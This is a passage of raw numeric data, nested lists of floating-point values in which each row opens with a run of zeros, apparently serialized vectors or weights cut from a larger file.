0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.881, -1.627, -0.652, -0.352, 0.3787, -0.07697, 0.2102, 0.1917, 0.1071, -0.0713, 
0.6055, 0.4006, 0.9404, 0.05225, -1.089, -0.356, -0.2238, 1.117, -0.7183, 1.135, -0.2788, 0.552, 0.4956, 0.5713, -0.2421, 0.1005, -1.187, 0.0881, -0.02892, 0.0509, 1.832, 0.686, -0.3992, 0.11444, 0.8896, -0.04907, -0.5664, -0.5723, 0.1434, -1.144, -0.729, 0.05862, 0.7437, 0.1675, 0.8027, 0.9497, -0.02495, 0.2852, -0.1688, 0.6265], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2238, 1.732, -0.3337, 0.09924, 0.1293, 0.5054, 0.1187, -0.0811, -0.2676, 0.1572, 0.3337, 0.1682, -0.501, -0.07166, 0.1749, -0.01923, -0.1411, 0.7144, -0.873, -0.324, -0.07623, -0.5825, -0.4202, 0.0748, -0.0944, 0.1337, 0.5312, 0.1559, -0.04578, -1.472, -0.1957, -0.9004, -0.2416, 0.03827, -0.2415, -0.643, 0.87, -0.8916, -0.3142, 0.4495, 0.08765, 0.04156, -0.1963, 0.1818, 0.1709, -0.683, -0.01816, 0.285, -0.05426, -1.104], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.1455, 0.08185, -0.2251, 1.18, -0.908, -0.0703, 0.974, 2.05, 0.2563, 0.5215, -0.1821, 0.01854, 0.2954, 0.8076, -1.577, -1.35, -0.042, 1.152, -0.1656, -0.543, 0.855, 0.1527, -0.2534, 0.0881, -0.4653, 0.1971, 0.629, 1.279, 0.003893, 0.33, -3.234, -0.4287, -0.3503, 0.851, 0.951, 0.01241, 0.503, 1.387, -0.2275, -0.1556, 0.8745, 0.971, 0.0988, -0.3174, 0.1014, -0.03128, -0.01678, 0.915, -0.2761, -0.1515], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.5864, -0.01252, 0.34, 1.762, -0.488, -0.5703, 0.2874, -0.05316, 0.11884, 
-0.625, 0.976, 0.05594, -0.2255, -0.412, -1.098, -0.272, 0.8315, 1.176, -0.255, -0.7627, -0.835, -1.058, -0.933, 0.1058, -0.2576, -0.3755, 0.1722, 0.519, -0.00605, -0.1203, 0.5845, 0.3657, -0.1395, -1.036, -0.3198, -0.1332, -0.1512, -0.07355, -0.249, 0.126, 0.1658, -0.1366, -0.4392, -0.5083, -0.02188, -0.2289, 0.03787, 0.02509, 1.513, -0.2377], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4556, 0.00346, -0.595, 0.514, -0.4133, 0.006268, 0.3396, -0.459, 0.1738, -0.1256, 0.522, 0.3015, 0.399, 0.2167, 0.912, -0.8477, -0.3003, 0.5005, -0.1268, -0.906, 1.424, -0.005733, 0.3542, -0.143, -0.641, 0.2979, 0.3586, 0.885, 0.01238, -0.02823, -1.535, -0.135, 0.589, -0.782, 0.1561, -0.434, 1.295, -3.635, 0.2583, -0.2085, -0.7734, -0.2239, -0.2019, -0.954, -0.0601, -0.3906, 0.009674, -0.6206, -0.1514, 0.059], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1383, -0.07135, -1.177, -0.316, 0.1508, 0.0462, -0.3386, -0.1744, 0.2842, -0.1903, -1.296, 0.1084, 0.1466, -0.1908, 0.2822, -0.01738, 0.7207, -0.429, -0.2184, -0.2625, 0.1848, -0.7065, 0.203, -0.00222, -0.4224, 0.5093, -0.00799, 0.0755, 0.02489, -0.1037, 0.3643, 0.641, 0.4626, -0.206, -0.8804, -0.09216, 0.04147, -2.068, 0.0256, -0.8774, 0.1131, 0.1294, 0.493, 0.1085, -0.1755, 0.1505, -0.00118, -0.0897, -0.4094, -0.07227], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.508, -0.0515, 0.5522, -1.418, 0.0554, 0.532, 0.1646, 
-0.0977, -0.5264, -1.256, -1.189, 0.07025, -0.2314, -0.2837, 0.582, -0.04376, 1.068, 0.767, -0.653, 0.01727, 0.558, 0.515, 0.8706, -0.04813, -0.7563, -0.8696, 0.3726, 0.1865, 0.00375, 0.1926, -3.38, 0.129, 0.3625, -0.39, 1.486, -0.1082, -0.4001, -0.4934, 0.1533, -0.1248, -1.137, -0.2964, -0.0316, 0.9233, 1.075, 0.1871, -0.0263, -1.31, -0.2993, 0.1857], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2664, -0.1221, 0.02196, -1.07, -0.1368, -0.04895, 1.231, -0.332, 0.09686, -0.1271, -0.3167, -0.0645, 0.1328, 0.4731, 0.7563, 0.3542, 0.03683, 0.8916, -0.9775, -0.912, 0.1484, -1.061, -0.1279, 0.05426, 0.2878, 0.0512, -0.676, -0.7803, 0.02919, 0.02614, 0.4346, 0.941, -1.545, 0.0638, -0.12177, -0.2766, 0.717, 0.1414, -0.1552, 0.03015, 0.02509, 0.3623, -0.3555, -0.1729, 0.4016, -0.287, 0.02531, 0.7104, -0.1436, 0.1455], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.668, -0.6494, 0.4067, -0.89, -1.323, 1.0625, 0.7954, -1.8125, -1.628, -2.09, 0.2986, -0.5527, -1.822, -0.5474, 0.721, 0.7935, 0.607, -0.2307, 0.001179, 1.155, -0.2091, -0.564, -0.2158, -0.1797, 0.06555, 0.2089, -0.954, -0.4832, -0.003439, 0.2468, 1.696, 2.227, -1.667, -0.4382, -0.2343, -0.3582, -1.356, 0.2126, -0.418, -0.7495, 0.043, -2.27, 2.146, 0.812, -1.504, -0.2015, -0.03006, 0.2532, 1.28, 0.2317], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.676, -0.02301, -0.892, 0.1954, -0.555, 0.2583, -0.54, 
-0.4595, 0.2456, 1.301, -0.1587, 0.1837, -0.06183, -0.0952, 0.4343, -0.471, -0.1519, 1.582, 0.1969, 1.854, -0.3206, 0.557, -0.0609, -0.0589, -0.6772, 0.3413, -0.2312, 0.6665, 0.00458, -0.0783, -0.7866, 0.98, 0.803, 0.5747, -0.1244, 0.4482, 0.524, -0.8896, 0.0917, 0.0712, -0.8174, -0.1583, -0.645, -0.3428, 0.654, -0.0853, 0.04306, -0.4163, -0.3438, 0.2142], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0501, 0.06085, -0.6377, 0.01707, 0.07874, -0.10626, 0.3792, 0.4456, 0.1545, 0.11743, -1.059, -0.3345, 0.2246, -0.2588, -0.793, -0.3176, -0.4988, 0.5845, -0.2808, -0.2194, 0.353, 0.10315, 0.9, -0.013824, -0.3164, 0.2168, -0.6294, 0.0895, -0.0286, -0.481, 0.11536, -0.2554, -0.4617, 0.064, 0.9165, 0.212, -0.05167, 0.2585, 0.279, -0.003763, -0.4233, -0.09283, 0.0353, -0.1153, 0.6167, -0.2556, 0.012726, -0.198, 0.04657, -0.455], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2086, 0.06805, 0.03021, 0.8955, 0.665, 0.4304, -1.27, -0.2957, 0.3245, 0.6196, 0.548, -0.2966, -0.6875, -0.1338, 0.6357, -0.3416, -0.3772, -0.1886, 1.84, 0.1061, -0.1863, 1.592, -0.0991, -0.02574, 0.9097, -0.159, -0.712, 0.9263, 0.01224, -0.4836, 1.318, 0.742, 0.26, 0.594, -1.167, -0.1214, -0.08203, 0.2046, 0.4287, 0.5933, 0.8423, -0.44, -0.6855, -0.1324, -0.2045, 0.1859, -0.02402, -0.7183, 0.596, 0.09906], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.5674, -0.4055, -1.802, -0.3093, 0.906, 
0.529, -0.2302, -0.02666, 0.0721, 0.932, -1.396, -0.2937, 0.299, -0.628, 0.2222, -0.2225, -1.237, 1.637, 0.303, -1.345, 0.569, 0.4915, 0.01416, 0.5977, -0.0124, -0.983, -0.2007, 0.913, 0.00718, -0.1686, -2.06, 0.9404, -0.6655, -1.044, -0.4756, 0.9165, 0.5874, 0.4607, 0.04135, 1.264, 0.3257, 0.1693, -0.1348, -0.507, 0.003403, -0.8535, -0.001388, -1.0, 1.286, -0.039], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2076, 0.04248, -0.4966, -0.958, 0.11053, 0.04303, -0.5815, -0.3816, -0.1367, -0.4353, -0.4016, 0.05072, -0.12476, -0.0937, 1.694, 0.1917, 1.382, 0.4656, 0.3816, 0.6436, -0.09503, -0.0053, 0.398, -0.01151, 0.06854, -0.3489, 0.2664, 0.3306, -0.04526, 0.12476, 0.0681, 0.3232, 0.5, -0.197, -0.0836, 0.1589, 0.631, 0.4001, -0.4116, 0.1348, -0.191, -1.015, -0.692, 1.021, -0.856, -0.2976, -0.01785, -1.164, -0.4849, 0.1417], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.00819, -0.03482, 0.03894, -0.01996, -0.02843, -0.053, -0.04437, 0.02979, -0.0424, -0.000883, -0.03397, -0.04437, -0.04144, -0.0251, 0.001617, -0.01944, -0.03018, -0.003496, -0.041, -0.00391, 0.00506, 0.02684, 0.01434, -0.02122, 0.01299, -0.001869, -0.008316, 0.02098, -0.02208, -0.000146, -0.05084, -0.02834, -0.04208, -0.02493, 0.03494, 0.02783, 0.0231, -0.04254, 0.0367, -0.01837, -0.05023, 0.02245, -0.0003963, 0.01447, -0.02608, 0.03436, 0.01253, 0.01566, -0.0228, 0.01245], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1855, -0.02951, 0.668, 1.292, 0.006313, -3.906, -0.1854, -0.3755, -0.9985, 0.3162, -0.884, -0.009865, -0.781, -0.01244, -1.267, 0.5464, -0.312, 0.2732, -0.2117, -0.5864, 0.3071, 1.579, -0.64, 0.0422, -0.03387, -0.498, 0.2957, -0.1315, 0.02008, 0.11395, 1.436, 1.866, 0.02809, -0.3967, 0.4558, -0.013145, -0.1362, 0.09424, 0.898, 0.8804, 0.07007, -0.4119, 1.42, -0.1256, 0.2722, 0.2522, 0.007168, -0.07587, 0.6, 0.1572], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -3.264, 0.07104, 0.2338, -6.613, 0.0804, -0.02171, -0.1943, 0.535, 0.3655, -2.62, 0.2429, -0.09265, -0.2515, 0.711, 1.082, -1.48, -0.11316, 1.269, 0.735, 2.902, -0.1225, 0.2034, -0.1562, 0.01953, -0.599, 0.646, -2.014, 1.46, -0.02917, 0.1081, -0.004784, 3.0, -2.07, 0.531, -0.4614, -0.1879, -0.2438, -0.3428, 0.1312, -0.02666, 0.007652, -2.488, -0.4756, -0.06216, 0.1371, -0.1206, 0.02316, -0.08386, -1.666, 0.2407], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.2656, -0.1437, -0.5996, -0.4602, 1.157, 0.1396, 0.365, 0.7783, 0.5464, -0.2388, -0.711, -0.079, 0.02847, 0.0857, 0.541, 0.03604, 0.4988, 1.179, -0.0748, 0.2465, -0.3967, 1.449, -0.1624, -0.3818, -0.586, 0.808, -1.455, -0.3008, 0.0619, 0.456, 0.5933, 0.5366, -0.7085, 0.1057, -0.362, 0.811, -0.599, -0.387, -0.3086, 1.513, 0.2612, -1.673, 0.829, 0.10974, 0.2766, -0.346, -0.04254, 0.4868, -0.04733, 0.71], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1926, 0.118, 0.01654, 1.534, 0.329, -0.2458, 0.8726, 0.6284, 0.10486, -1.196, 0.3376, 0.1753, 0.5146, -0.3398, -1.223, -0.314, -0.155, -0.53, -0.0363, -0.9233, 0.4001, -0.811, 0.1509, 0.152, -0.7485, 0.3176, -0.1676, 0.02672, -0.007313, -0.1943, -0.1318, 0.0616, 0.05328, -1.033, 0.1263, 0.3132, -0.1571, 0.738, 0.2502, -0.294, -0.1907, -0.0491, -0.264, 0.0274, -0.06198, 0.3853, -0.04056, -0.0924, -0.38, 0.10724], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1617, 0.2039, 0.6406, 1.703, 0.04742, -0.1367, -0.0511, 1.435, 0.648, -1.077, 0.4607, 0.752, 0.1703, -0.1499, -0.822, 3.51e-05, 0.761, 0.02852, -0.3777, 1.111, 0.1489, -0.09094, 0.1705, 0.03992, -1.467, 0.1189, -0.1915, 0.1099, -0.03745, 0.02507, -3.28, -0.1606, 0.495, -1.659, 0.607, -0.04315, 0.4773, -0.1887, -0.5728, -0.2085, -0.955, 1.055, -0.544, 0.05344, 0.2006, 0.1271, -0.0319, -1.084, -1.033, 0.1261], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1882, -0.4114, -0.8965, -0.7036, 0.2407, -0.5996, -0.509, -0.4229, 0.5537, -0.3613, -1.449, -0.0844, 0.2191, 0.525, 0.3096, -0.1942, 0.133, 0.625, 0.3782, -0.6064, 0.1498, 1.229, -0.0348, 0.9053, -0.3394, 0.1031, -0.2236, 0.143, 0.04932, 0.1478, -0.53, 0.632, 0.1316, 0.9126, -0.2102, 0.185, -0.2722, -0.4983, 1.045, -0.06976, 0.618, -0.4229, -0.0768, -0.0735, 0.271, 0.0662, -0.02477, -0.0854, -0.167, 0.8843], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.0717, -0.03214, 0.9956, 1.651, 0.4485, -0.2668, -0.28, -0.2957, -0.02747, 0.894, 0.4421, -0.04596, -0.2473, -0.286, 0.3596, 0.1626, 0.10175, -2.027, 0.2493, -0.2659, 0.607, 3.777, -0.3904, -0.1945, -0.2455, 0.0586, -0.0895, 0.3435, -0.01689, 0.665, -1.171, 0.311, 0.3232, -0.7915, 0.2595, 1.238, -0.2886, -0.6934, -0.656, 1.535, 0.12494, 0.4124, 1.45, 0.9297, -0.412, 0.8857, 0.010605, -0.2954, -0.461, 0.8276], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.002138, -0.01773, -0.03723, 0.0355, -0.03796, 0.01174, -0.01219, 0.0376, -0.0119, -0.03345, -0.00827, -0.02162, -0.0438, 0.0204, -0.003004, -0.03214, -0.010864, 0.0342, 0.0397, -0.01329, 0.0281, -0.01305, 0.00796, -0.02695, -0.05264, -0.014755, 0.03082, -0.0548, 0.001579, -0.02927, -0.03537, -0.04486, -0.0169, -0.00567, -0.004307, -0.0435, -0.04276, -0.02019, 0.0287, -0.013954, -0.05762, -0.0459, 0.02869, -0.05243, -0.02156, 0.03305, 0.03525, 0.01255, 0.02452, -0.05103], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0301, -0.04053, 0.0108, 0.0401, 0.01903, 0.03244, -0.00485, -0.001634, -0.013824, -0.04797, -0.03592, -0.0273, -0.03824, -0.03113, -0.05908, 0.02681, -0.03934, 0.03934, 0.015366, -0.0391, 0.007004, 0.01144, -0.007812, -0.01192, -0.04156, -0.0206, -0.05612, 0.03235, -0.03754, 0.01854, 0.04153, -0.04947, -0.04813, 0.03137, 0.01125, -0.0092, -0.0558, 0.003317, -0.01226, -0.0273, -0.02608, 0.0349, -0.0006857, -0.02965, -0.00941, -0.03723, -0.02367, 0.01147, -0.0342, -0.01665], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1343, -0.2502, 0.624, -0.73, 0.348, 0.7935, -0.1227, -1.567, -0.5845, -0.6987, -0.2666, -0.338, 0.4604, 0.8643, 0.999, 0.4104, -1.167, -1.517, 0.2063, 0.5625, 0.4854, -0.8203, -0.337, 0.0236, 0.2465, 0.735, 0.07654, -0.587, 0.0359, 0.264, 1.626, -1.081, -0.2113, 0.2876, 0.76, -0.06934, -0.4355, 0.7227, -0.1683, -0.3984, -0.12335, -1.35, 0.0649, -0.0595, -0.3857, 0.2352, 0.02303, 0.1373, 0.7095, 0.03702], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.09875, -0.3013, -1.249, -0.00528, 1.113, 0.4102, -0.7324, 0.77, 0.5654, 0.9077, -0.52, 0.0785, 1.772, -0.0931, -0.4348, -0.2712, 0.843, 0.3784, -0.185, 0.94, -0.3684, 0.4287, -0.94, 0.5645, -0.3545, 0.2458, 0.05997, 0.5234, 0.00783, 0.9233, -1.006, 1.033, 0.2876, -0.2255, -0.745, 0.5103, -0.7114, -0.9663, -0.3267, 1.373, 0.1667, 1.677, -0.10596, 0.743, 0.5493, 0.1317, -0.01852, -0.585, -0.01625, 0.07007], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.1118, -0.3843, -0.0159, 0.4937, 0.48, -0.4868, -0.2396, 0.3708, -0.947, -0.26, -0.5547, -0.2426, 0.11707, -0.2656, -0.02254, 0.0794, -0.6514, 0.1087, 0.365, -1.1, 0.3735, -0.6655, -0.4983, 1.809, 0.004787, 0.0234, 0.02655, 0.01172, 0.000638, 0.22, -0.1545, 0.5894, -0.1301, -0.0492, -0.6304, 0.235, 0.641, 0.1846, 1.393, -0.8564, -0.2842, -0.784, 1.235, -0.2532, 0.1095, 1.343, 0.01917, -0.316, 0.31, 0.893], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3618, -0.1559, 0.3574, 0.0539, 0.3572, -0.3337, 0.1912, 0.989, 0.01208, 0.9756, 0.1698, 0.4756, 0.4705, 0.2122, 0.4666, 0.3564, 0.1462, -1.471, -1.281, 0.867, 1.139, 1.157, -0.2324, -0.10583, -0.64, 0.3599, 0.6265, -0.7217, -0.02307, -0.2505, 0.3003, -0.528, 0.0928, 0.743, 0.1178, 0.3665, -0.000263, -0.959, -0.07684, 0.1353, -1.224, 0.5522, 0.3774, -0.4185, -0.3713, 0.1848, 0.0276, 0.2217, -0.2424, -0.429], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 